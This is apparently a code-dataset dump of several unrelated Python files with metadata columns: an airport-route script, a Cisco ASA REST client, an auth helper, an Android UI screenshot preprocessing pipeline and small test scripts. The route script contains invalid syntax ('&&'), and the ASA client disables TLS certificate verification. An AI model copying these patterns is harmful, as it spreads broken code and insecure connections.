| 34.315789 | 60 | 0.480828 | 152 | 1,304 | 4.039474 | 0.513158 | 0.14658 | 0.032573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025485 | 0.368098 | 1,304 | 37 | 61 | 35.243243 | 0.71966 | 0.015337 | 0 | 0 | 0 | 0 | 0.127559 | 0 | 0 | 0 | 0 | 0.027027 | 0 | 1 | 0.03125 | false | 0 | 0.0625 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ac85f7048458c2addf6b3de189fc26545d191a3 | 1,173 | py | Python | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | #!/bin/env python3
pathString = ["PDX-SFO", "SEA-JFK", "SFO-SEA", "LAX-PDX"]
def breakPairs(pairList):
toFrom = {}
fromTo = {}
srca = ''
dsta = ''
src = ''
dst = ''
for i in pairList:
airports = i.split('-')
toFrom[airports[0]] = airports[1]
fromTo[airports[1]] = airports[0]
for key in toFrom.keys():
if key not in fromTo.keys():
srca = key
for keye in fromTo.keys():
if keye not in toFrom.keys():
dsta = keye
retString = f"{ srca }-{ toFrom[srca] }, "
src = toFrom[srca]
for e in toFrom.keys():
if toFrom.get(e) && fromTo.get(e):
retString = f"{ retString }{ fromTo[e] }-{ toFrom[fromTo[e]] }, "
# if srca:
# for e in fromTo.keys():
# if dsta and fromTo.get(e):
# retString = f"{retString}{e}-{toFrom[e]}, "
# else:
# retString = f"{e}-{toFrom[e]}, {retString}"
# srca = toFrom.get(e)
# dsta = fromTo.get(e)
print(f"Path: { retString }")
if __name__ == "__main__":
print(f"Unsorted: { pathString }")
breakPairs(pathString)
| 23.938776 | 77 | 0.498721 | 139 | 1,173 | 4.151079 | 0.294964 | 0.034662 | 0.062392 | 0.048527 | 0.10052 | 0.10052 | 0 | 0 | 0 | 0 | 0 | 0.006369 | 0.330776 | 1,173 | 48 | 78 | 24.4375 | 0.728662 | 0.232737 | 0 | 0 | 0 | 0 | 0.176207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ac8b758a4914d28a0b5c6ed5e7469c1911dac47 | 2,526 | py | Python | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | import requests
from requests.auth import HTTPBasicAuth
from enum import Enum, auto
import json.tool
# suppress the message which comes from the self-signed certificate of ASA
requests.packages.urllib3.disable_warnings()
def sendrequest(verb, headers, url, auth, data=''):
"""
Helper method used by the methods in ASA class to
send HTTP-based request to ASA
"""
try:
response = requests.request(verb, headers=headers, url=url, verify=False, auth=auth, data=data)
except requests.exceptions.ConnectionError:
print('Unable to reach url {0}'.format(url))
exit(1)
if response.status_code == 401:
print(
"Login request failed. Status Code {}".format(
response.status_code
)
)
print("Response body: ")
print(response.text)
exit(1)
return response
class ASA(object):
"""A simple object for interacting with Cisco ASA through its REST API"""
def __init__(self, address, username, password):
"""
Setup a new ASA object given address and credentials
"""
self.address = address
self.auth = HTTPBasicAuth(username, password)
self.headers = {"content-type": "application/json", "accept": "application/json"}
def getAllPhysicalIfaces(self):
"""
Use the REST API of ASA to Log into and retrieve all physical interfaces
"""
url = "https://{0}/api/interfaces/physical".format(self.address)
return sendrequest('GET', self.headers, url, self.auth).json()
def setDescMgmtIface(self,desc):
"""
Configures a description for the Management Interface of Cisco ASA
"""
payload = {
"kind" : "object#MgmtInterface",
"interfaceDesc" : "{0}".format(desc)
}
url = "https://{0}/api/interfaces/physical/Management0_API_SLASH_0".format(self.address)
sendrequest('PATCH', self.headers, url, self.auth, json.dumps(payload))
def createLocalUsr(self, name, password, privilegeLevel):
"""
Create local user on Cisco ASA
"""
payload = {
"kind" : "object#LocalUserObj",
"name" : "{0}".format(name),
"password" : "{0}".format(password),
"privilegeLevel" : "{0}".format(privilegeLevel)
}
url = "https://{0}/api/objects/localusers".format(self.address)
sendrequest('POST', self.headers, url, self.auth, json.dumps(payload))
| 31.575 | 103 | 0.61441 | 283 | 2,526 | 5.448763 | 0.434629 | 0.027237 | 0.01751 | 0.023346 | 0.137484 | 0.105058 | 0.049287 | 0.049287 | 0 | 0 | 0 | 0.008621 | 0.265241 | 2,526 | 79 | 104 | 31.974684 | 0.822198 | 0.176564 | 0 | 0.088889 | 0 | 0 | 0.184921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.088889 | 0.088889 | 0 | 0.266667 | 0.088889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7acab154c2fe79d2a9e8272d3e4b0a39eb8dbfdd | 1,399 | py | Python | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | import bcrypt
from fastapi_jwt_auth import AuthJWT
from passlib.context import CryptContext
from .schemas import UserInDB, UserPassword
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
class Authenticate:
def create_salt_and_hashed_password(
self, *, plaintext_password: str
) -> UserPassword:
salt = self.generate_salt()
hashed_password = self.hash_password(password=plaintext_password, salt=salt)
return UserPassword(salt=salt, password=hashed_password)
@staticmethod
def generate_salt() -> str:
return bcrypt.gensalt().decode()
@staticmethod
def hash_password(*, password: str, salt: str) -> str:
return pwd_context.hash(password + salt)
@staticmethod
def verify_password(*, password: str, salt: str, hashed_pw: str) -> bool:
return pwd_context.verify(password + salt, hashed_pw)
@staticmethod
def create_access_token_for_user(*, user: UserInDB, Authorize: AuthJWT) -> str:
if not user or not isinstance(user, UserInDB):
return None
return Authorize.create_access_token(subject=user.user_name)
@staticmethod
def create_refresh_token_for_user(*, user: UserInDB, Authorize: AuthJWT) -> str:
if not user or not isinstance(user, UserInDB):
return None
return Authorize.create_refresh_token(subject=user.user_name)
| 34.121951 | 84 | 0.706219 | 165 | 1,399 | 5.781818 | 0.30303 | 0.078616 | 0.037736 | 0.048218 | 0.33543 | 0.230608 | 0.230608 | 0.230608 | 0.230608 | 0.230608 | 0 | 0 | 0.203717 | 1,399 | 40 | 85 | 34.975 | 0.856373 | 0 | 0 | 0.290323 | 0 | 0 | 0.007148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0.354839 | 0.129032 | 0.096774 | 0.612903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7acba5203922316cadaa6ed16f71cc4bbd1b8a30 | 18,175 | py | Python | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | import argparse
import os
import glob
import shutil
import json
import re
import hashlib
import numpy as np
import sys
import imgaug as ia
from imgaug import augmenters as iaa
from multiprocessing import Pool, Value, Manager
from lxml import etree
from PIL import Image, ImageFile, ImageDraw, ImageFont
ImageFile.LOAD_TRUNCATED_IMAGES = True
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing app packages")
a = parser.parse_args()
outputDir = "android_data_ambig_aug2_pb"
dir_img = os.path.join(outputDir, "PNGImages")
dir_set = os.path.join(outputDir, "ImageSets")
dir_ann = os.path.join(outputDir, "Annotations")
#target_list = ["Button", "ImageButton", "CompoundButton", "ProgressBar", "SeekBar", "Chronometer", "CheckBox", "RadioButton", "Switch", "EditText", "ToggleButton", "RatingBar", "Spinner",] # "View"]
target_list = ["TextView", "Button", "ImageButton", "SeekBar", "CheckBox", "RadioButton", "EditText",]
def checkFileValidity(inputFile):
'''
Check the validity of the XML file and ignore it if possible
Due to the unknown reasons, the content in some XML file is repetative or
'''
homeScreen_list = ["Make yourself at home", "You can put your favorite apps here.", "To see all your apps, touch the circle."]
unlockHomeScreen_list = ["Camera", "[16,600][144,728]", "Phone", "[150,1114][225,1189]", "People", "[256,1114][331,1189]", "Messaging", "[468,1114][543,1189]", "Browser", "[574,1114][649,1189]"]
browser = ["com.android.browser:id/all_btn", "[735,108][800,172]", "com.android.browser:id/taburlbar", "com.android.browser:id/urlbar_focused"]
with open(inputFile) as f:
content = f.read()
#it is the layout code for the whole window and no rotation
if 'bounds="[0,0][800,1216]"' in content and '<hierarchy rotation="1">' not in content:
if not all(keyword in content for keyword in browser) and not all(keyword in content for keyword in homeScreen_list) and not all(keyword in content for keyword in unlockHomeScreen_list):
#it should not be the homepage of the phone
bounds_list = re.findall(r'bounds="(.+?)"', content)
if len(bounds_list) < 2:
return False
#if float(len(bounds_list)) / len(set(bounds_list)) < 1.2: #so far, we do not check this option
#print len(text_list), len(set(text_list)), inputFile.split("\\")[-1]
return True
return False
def getDimensions(coor_from, coor_to):
dim = {}
dim['width'] = coor_to[0] - coor_from[0]
dim['height'] = coor_to[1] - coor_from[1]
return dim
def remove_overlap(widgets, status_bar):
global countValidFile, train_val
w = []
widgets.reverse()
layout = np.zeros((801,1217), dtype=np.int)
for idx, widget in enumerate(widgets):
overlap = False
starti = widget['coordinates']['from'][0] + 1
endi = widget['coordinates']['to'][0] - 1
startj = widget['coordinates']['from'][1] + 1
endj = widget['coordinates']['to'][1] - 1
for i in range(starti, endi + 1):
for j in range(startj, endj + 1):
if layout[i][j] == 1:
if widget['leaf']:
overlap = True
layout[i][j] = -1
elif layout[i][j] == -1:
overlap = True
elif layout[i][j] == 2:
if widget['leaf']:
overlap = True
layout[i][j] = -1
else:
if widget['leaf']:
layout[i][j] = 1
else:
layout[i][j] = 2
if overlap == True:
continue
else:
if widget['leaf'] and widget['widget_class'] in target_list:
if widget['widget_class'] == "View" and not(widget['clickable'] == "true" and widget['focusable'] == "true"):
continue
w.append(widget)
if w:
with countValidFile.get_lock():
countValidFile.value += 1
try:
im = Image.open(w[0]['src']+'.png')
if status_bar:
clip = im.crop((0, 33, 800, 1216))
else:
clip = im.crop((0, 0, 800, 1216))
except OSError as err:
print w[0]['src']
print "[-] OSError - " + str(err)
sys.stdout.flush()
pass
except IndexError as err:
print w[0]['src']
print "[-] IndexError - " + str(err)
sys.stdout.flush()
#print "[-] " + str(widget['coordinates'])
#print "[-] " + str(widget['dimensions'])
pass
except IOError as err: #image file is truncated
print w[0]['src']
print "[-] IOError - " + str(err)
sys.stdout.flush()
pass
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(countValidFile.value)))
if countValidFile.value % 30 == 1:
val = train_val['val']
val.append("{:06d}".format(countValidFile.value))
train_val['val'] = val
else:
train = train_val['train']
train.append("{:06d}".format(countValidFile.value))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(countValidFile.value))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(countValidFile.value)), 'a+') as f:
#tmp = {}
#tmp['app'] = w
json.dump(w, f, sort_keys=True, indent=3, separators=(',', ': '))
#with open(os.path.join(dir_ann, "{0:0>6}.txt".format(countValidFile.value)), 'a+') as f:
# json.dump(widget, f, sort_keys=True, indent=3, separators=(',', ': '))
def compareHisto(first, sec):
imA = Image.open(first)
imB = Image.open(sec)
# Normalise the scale of images
if imA.size[0] > imB.size[0]:
imA = imA.resize((imB.size[0], imA.size[1]))
else:
imB = imB.resize((imA.size[0], imB.size[1]))
if imA.size[1] > imB.size[1]:
imA = imA.resize((imA.size[0], imB.size[1]))
else:
imB = imB.resize((imB.size[0], imA.size[1]))
hA = imA.histogram()
hB = imB.histogram()
sum_hA = 0.0
sum_hB = 0.0
diff = 0.0
for i in range(len(hA)):
#print(sum_hA)
sum_hA += hA[i]
sum_hB += hB[i]
diff += abs(hA[i] - hB[i])
return diff/(2*max(sum_hA, sum_hB))
def rem(ann):
ann['coordinates']['from'] = list(ann['coordinates']['from'])
ann['coordinates']['to'] = list(ann['coordinates']['to'])
ann['coordinates']['from'][1] = ann['coordinates']['from'][1] - 33
ann['coordinates']['to'][1] = ann['coordinates']['to'][1] - 33
ann['coordinates']['from'] = tuple(ann['coordinates']['from'])
ann['coordinates']['to'] = tuple(ann['coordinates']['to'])
return ann
def augment(img, anns):
global stats
width, height = img.size
img = np.array(img, dtype=np.uint8)
valid = []
kps = []
for a in anns:
x1 = a['coordinates']['from'][0]
y1 = a['coordinates']['from'][1]
x2 = a['coordinates']['to'][0]
y2 = a['coordinates']['to'][1]
kps.extend([ia.Keypoint(x=x1, y=y1), ia.Keypoint(x=x2, y=y2),])
stats[a['widget_class']] += 1
keypoints = ia.KeypointsOnImage(kps, shape=img.shape)
#seq = iaa.Sequential([iaa.Fliplr(1.0)])
'''
seq = iaa.SomeOf(1, [
iaa.Fliplr(1.0),
iaa.CropAndPad(percent=(-0.25, 0.25)),
iaa.CropAndPad(percent=(-0.2, 0.2))
])
'''
seq = iaa.Sometimes(
0.3,
iaa.Fliplr(1.0),
iaa.CropAndPad(percent=(-0.25, 0.25))
)
seq_det = seq.to_deterministic()
# augment keypoints and images
img_aug = seq_det.augment_images([img])[0]
keypoints_aug = seq_det.augment_keypoints([keypoints])[0]
im = Image.fromarray(img_aug)
#for i, value in range(len(anns)):
for i, value in enumerate(anns):
'''
if keypoints_aug.keypoints[i*2].x == -1:
keypoints_aug.keypoints[i*2].x = 0
if keypoints_aug.keypoints[i*2+1].x == -1:
keypoints_aug.keypoints[i*2+1].x = 0
'''
if keypoints_aug.keypoints[i*2].x > keypoints_aug.keypoints[i*2+1].x:
temp = keypoints_aug.keypoints[i*2].x
keypoints_aug.keypoints[i*2].x = keypoints_aug.keypoints[i*2+1].x
keypoints_aug.keypoints[i*2+1].x = temp
if keypoints_aug.keypoints[i*2].x < 0:
keypoints_aug.keypoints[i*2].x = 0
if keypoints_aug.keypoints[i*2].x > width:
keypoints_aug.keypoints[i*2].x = width
if keypoints_aug.keypoints[i*2+1].x < 0:
keypoints_aug.keypoints[i*2+1].x = 0
if keypoints_aug.keypoints[i*2+1].x > width:
keypoints_aug.keypoints[i*2+1].x = width
if keypoints_aug.keypoints[i*2].y < 0:
keypoints_aug.keypoints[i*2].y = 0
if keypoints_aug.keypoints[i*2].y > height:
keypoints_aug.keypoints[i*2].y = height
if keypoints_aug.keypoints[i*2+1].y < 0:
keypoints_aug.keypoints[i*2+1].y = 0
if keypoints_aug.keypoints[i*2+1].y > height:
keypoints_aug.keypoints[i*2+1].y = height
anns[i]['dimensions'] = getDimensions((keypoints_aug.keypoints[i*2].x, keypoints_aug.keypoints[i*2].y), (keypoints_aug.keypoints[i*2+1].x, keypoints_aug.keypoints[i*2+1].y))
if anns[i]['dimensions']['width'] == 0 or anns[i]['dimensions']['height'] == 0:
continue
anns[i]['coordinates']['from'] = (keypoints_aug.keypoints[i*2].x, keypoints_aug.keypoints[i*2].y)
anns[i]['coordinates']['to'] = (keypoints_aug.keypoints[i*2+1].x, keypoints_aug.keypoints[i*2+1].y)
valid.append(i)
aug_anns = []
for idx in valid:
aug_anns.append(anns[idx])
'''
im = Image.fromarray(img_aug)
draw = ImageDraw.Draw(im)
for a in aug_anns:
draw.rectangle((a['coordinates']['from'], a['coordinates']['to']), outline="red")
'''
'''
for i in range(0,len(keypoints.keypoints),2):
before = keypoints.keypoints[i]
after = keypoints_aug.keypoints[i]
print "Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (i, before.x, before.y, after.x, after.y)
draw.rectangle((keypoints_aug.keypoints[i].x, keypoints_aug.keypoints[i].y, keypoints_aug.keypoints[i+1].x, keypoints_aug.keypoints[i+1].y), outline="red")
im.show()
'''
if aug_anns:
train_test_split(im, aug_anns, True)
def train_test_split(clip, anns, aug=False):
global countValidFile, train_val
with countValidFile.get_lock():
countValidFile.value += 1
count = countValidFile.value
if aug:
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
else:
if count % 15 == 1:
val = train_val['val']
val.append("{:06d}".format(count))
train_val['val'] = val
else:
aug = True
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(count))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(count)), 'a+') as f:
json.dump(anns, f, sort_keys=True, indent=3, separators=(',', ': '))
'''
draw = ImageDraw.Draw(clip)
for a in anns:
draw.rectangle((a['coordinates']['from'], a['coordinates']['to']), outline="red")
'''
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
return aug
def preprocess(input_folder):
global countValidFile, train_val
pnglist = []
hash_dict = {}
for infile in glob.glob(input_folder + "/stoat_fsm_output/ui/*.xml"):
widgets_xml = []
status_bar = False
name, ext = os.path.splitext(infile)
pngfile = infile.replace('.xml', '.png')
if os.path.exists(pngfile) and os.stat(pngfile).st_size > 0 and checkFileValidity(infile):
try:
Image.open(pngfile)
except Exception as e:
print e
sys.stdout.flush()
continue
# check for duplicate image
dup = False
if not pnglist:
pnglist.append(pngfile)
else:
for png in pnglist:
diff_score = compareHisto(pngfile, png)
if diff_score < 0.051:
dup = True
break
if dup:
continue
else:
pnglist.append(pngfile)
ctx = etree.iterparse(infile, events=('start',), tag='node')
for event, elem in ctx:
# Check for android status bar
if elem.attrib['bounds'] == "[0,33][800,1216]":
status_bar = True
widget_name = elem.attrib['class'].split('.')[-1]
coordinates = re.findall(r"(?<=\[).*?(?=\])", elem.attrib["bounds"])
if len(coordinates) != 2:
continue
#if not widget_name in target_list:
# continue
#if not widget_name in layout and len(elem.getchildren()) != 0:
# continue
if not widget_name in target_list or len(elem.getchildren()) != 0:
continue
coor_from = tuple(map(int, coordinates[0].split(",")))
coor_to = tuple(map(int, coordinates[1].split(",")))
if not (coor_from[0] > 800 or coor_from[0] < 0 or coor_to[0] > 800 or coor_to[0] < 0 or coor_from[1] > 1216 or coor_from[1] < 0 or coor_to[1] > 1216 or coor_to[1] < 0):
meta_data = {}
meta_data['widget_class'] = widget_name
meta_data['coordinates'] = {'from': coor_from, 'to': coor_to}
meta_data['dimensions'] = getDimensions(coor_from, coor_to)
if meta_data['dimensions']['width'] == 0 or meta_data['dimensions']['height'] == 0:
continue
#if (meta_data['widget_class'] in layout and not(len(elem.getchildren()) == 2 and elem.getchildren()[0].attrib['class'].split('.')[-1] == "ImageView" and len(elem.getchildren()[0].getchildren()) == 0 and elem.getchildren()[1].attrib['class'].split('.')[-1] == "TextView" and len(elem.getchildren()[1].getchildren()) == 0)):
# continue
#if meta_data['widget_class'] == "TextView" and not(not(elem.attrib['checkable'] == "true") and not(elem.attrib['checked'] == "true") and elem.attrib['clickable'] == "true" and elem.attrib['enabled'] == "true" and elem.attrib['focusable'] == "true" and not(elem.attrib['focused'] == "true") and not(elem.attrib['scrollable'] == "true") and elem.attrib['long-clickable'] == "true"):
# continue
if (meta_data['widget_class'] == "TextView" and not(len(elem.attrib['text'].split(" ")) <= 3 and not(elem.attrib['checkable'] == "true") and not(elem.attrib['checked'] == "true") and elem.attrib['clickable'] == "true" and elem.attrib['enabled'] == "true" and elem.attrib['focusable'] == "true" and not(elem.attrib['focused'] == "true") and not(elem.attrib['scrollable'] == "true") and elem.attrib['long-clickable'] == "true")):
continue
# Classify ProgressBar(PB) as circular/horizontal based on aspect ratio, remaining regarded as invalid
# Circular PB: aspect_ratio == 1
# Horizontal PB: aspect_ratio < 0.3
'''
if meta_data['widget_class'] == "ProgressBar":
ar = float(meta_data['dimensions']['height']) / float(meta_data['dimensions']['width'])
if ar == 1:
meta_data['widget_class'] = "CirProgressBar"
elif ar < 0.3:
meta_data['widget_class'] = "HrzProgressBar"
else:
widgets_xml = []
break
'''
meta_data['text'] = elem.attrib['text']
meta_data['clickable'] = elem.attrib['clickable']
meta_data['focusable'] = elem.attrib['focusable']
meta_data["content-desc"] = elem.attrib['content-desc']
meta_data['src'] = name
#if meta_data['widget_class'] == "TextView" or meta_data['widget_class'] in layout:
if meta_data['widget_class'] == "TextView":
meta_data['widget_class'] = "ImageButton"
widgets_xml.append(meta_data)
else:
continue
if widgets_xml:
try:
im = Image.open(pngfile)
if status_bar:
clip = im.crop((0, 32, 800, 1216))
w = [rem(ann) for ann in widgets_xml if not (ann['coordinates']['from'][1] < 33 or ann['coordinates']['to'][1] < 33)]
else:
clip = im.crop((0, 0, 800, 1216))
w = widgets_xml
except OSError as err:
print pngfile
print "[-] OSError - " + str(err)
sys.stdout.flush()
continue
except IndexError as err:
print pngfile
print "[-] IndexError - " + str(err)
sys.stdout.flush()
continue
except IOError as err: #image file is truncated
print pngfile
print "[-] IOError - " + str(err)
sys.stdout.flush()
continue
'''
fnt = ImageFont.truetype("arial.ttf", 17)
draw = ImageDraw.Draw(clip)
for label in w:
draw.rectangle((label['coordinates']['from'], label['coordinates']['to']), outline="black")
draw.text(label['coordinates']['from'], label['widget_class'], font=fnt, fill="black")
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
'''
# Train/Test split for augmented dataset
'''
aug = train_test_split(clip, w)
if aug:
augment(clip, w)
'''
# Train/Test split for unaugmented dataset
with countValidFile.get_lock():
countValidFile.value += 1
count = countValidFile.value
if count % 10 == 1:
val = train_val['val']
val.append("{:06d}".format(count))
train_val['val'] = val
else:
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(count))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(count)), 'a+') as f:
json.dump(w, f, sort_keys=True, indent=3, separators=(',', ': '))
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
def init(c, t, s):
global countValidFile, train_val, stats
countValidFile = c
train_val = t
train_val['train'] = []
train_val['val'] = []
train_val['trainval'] = []
stats = s
for t in target_list:
stats[t] = 0
if __name__ == '__main__':
countValidFile = Value('i', 0)
train_val = Manager().dict()
stats = Manager().dict()
folders_list = glob.glob(a.input_dir + "/*20170510_cleaned_outputs*/**")
'''
fname = os.path.join("android_data", "Annotations", "000001.txt")
with open(fname) as f:
datastore = json.load(f)
bb_from = datastore[0]['coordinates']['from']
print bb_from, bb_from[0]
'''
#create dataset directory
dir_list = [outputDir, dir_img, dir_set, dir_ann]
if os.path.exists(outputDir):
shutil.rmtree(outputDir)
for d in dir_list:
os.makedirs(d)
num_processed = 0
pool = Pool(processes=6, initializer=init, initargs=(countValidFile, train_val, stats))
#pool = Pool(processes=6)
for r in pool.imap(preprocess, folders_list):
num_processed += 1
if num_processed%5 is 0:
print "%s of %s processed" % (num_processed, len(folders_list))
sys.stdout.flush()
pool.close()
pool.join()
with open(os.path.join(dir_set, "train.txt"), 'a+') as f:
for idx in train_val["train"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "val.txt"), 'a+') as f:
for idx in train_val["val"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "trainval.txt"), 'a+') as f:
for idx in train_val["trainval"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "stats.txt"), 'a+') as f:
for t in target_list:
f.write("{} - {}\n".format(t, stats[t]))
| 32.806859 | 435 | 0.643301 | 2,679 | 18,175 | 4.266144 | 0.155282 | 0.041998 | 0.07166 | 0.075072 | 0.420072 | 0.371511 | 0.349987 | 0.284889 | 0.250853 | 0.214629 | 0 | 0.030718 | 0.17249 | 18,175 | 554 | 436 | 32.806859 | 0.729189 | 0.120165 | 0 | 0.338798 | 0 | 0 | 0.141492 | 0.014844 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.008197 | 0.038251 | null | null | 0.038251 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7acbb0a39bd2e8157fd784661046a2e583513ba0 | 1,256 | py | Python | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 41 | 2016-01-14T15:28:53.000Z | 2022-03-17T12:43:01.000Z | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 5 | 2016-01-20T09:42:30.000Z | 2016-12-22T22:54:27.000Z | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 3 | 2016-01-20T09:40:28.000Z | 2020-10-29T09:33:48.000Z | import logging
assert(pyrate_version > (0, 1, 9))
assert(pyrate_version >= '0.1.10')
assert(pyrate_version != '0.0.1')
assert(pyrate_version == pyrate_version)
match('*.cpp', recurse = True)
exe = executable('test.bin', ['test.cpp'])
exe = executable('test.bin', ['test.cpp'])
try:
executable('test.bin', ['test.cpp', None])
except Exception:
logging.critical('None found!')
try:
executable('test.bin', ['test.cpp', version])
except Exception:
logging.critical('Invalid input!')
find_external('libc++')
find_external('abcd')
find_toolchain('abcd')
str(exe)
str(default_context.platform)
str(exe.build_src[0])
str(exe.build_rule)
repr(default_context.platform)
repr(macro('DEBUG'))
repr(toolchain)
repr(tools)
len(tools)
str(install(exe)[0])
for tool in tools:
logging.critical('%s: %s', tool, repr(tools[tool]))
logging.critical('deleting c/c++')
del tools['c']
del tools['cpp']
for tool in tools:
logging.critical('%s: %s', tool, repr(tools[tool]))
try:
object_file('test.obj', ['test.cpp'])
except Exception:
logging.critical('rule not found!')
try:
find_rule('object', 'cpp')
except Exception:
logging.critical('rule not found!')
try:
find_internal('test.bin')
except Exception:
logging.critical('multiple test.bins found!')
assert(False)
| 24.153846 | 52 | 0.713376 | 184 | 1,256 | 4.788043 | 0.315217 | 0.136209 | 0.124858 | 0.170261 | 0.397276 | 0.349603 | 0.227015 | 0.227015 | 0.227015 | 0.227015 | 0 | 0.010536 | 0.093153 | 1,256 | 51 | 53 | 24.627451 | 0.76295 | 0 | 0 | 0.367347 | 0 | 0 | 0.192675 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 1 | 0 | false | 0 | 0.020408 | 0 | 0.020408 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7acc9ee1bc31164a1469a0d9996ab350cd9b5055 | 1,424 | py | Python | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | null | null | null | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | 2 | 2021-06-08T19:28:41.000Z | 2021-09-07T23:47:14.000Z | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | null | null | null | from MessageAnalyzer import MessageAnalyzer
class WAPPMessageAnalyzer(MessageAnalyzer):
WAPP_DATE_REGEX = "[0-9]{1,2}/[0-9]{1,2}/[0-9]{1,2}"
WAPP_TIME_REGEX = "[0-9]{1,2}:[0-9]{1,2}"
WAPP_EXTRACT_PARTICIPANT_REGEX = r"{date}\s*,\s*{time}\s*-\s*(.+?)\s*:\s*"\
.format(
date=WAPP_DATE_REGEX,
time=WAPP_TIME_REGEX
)
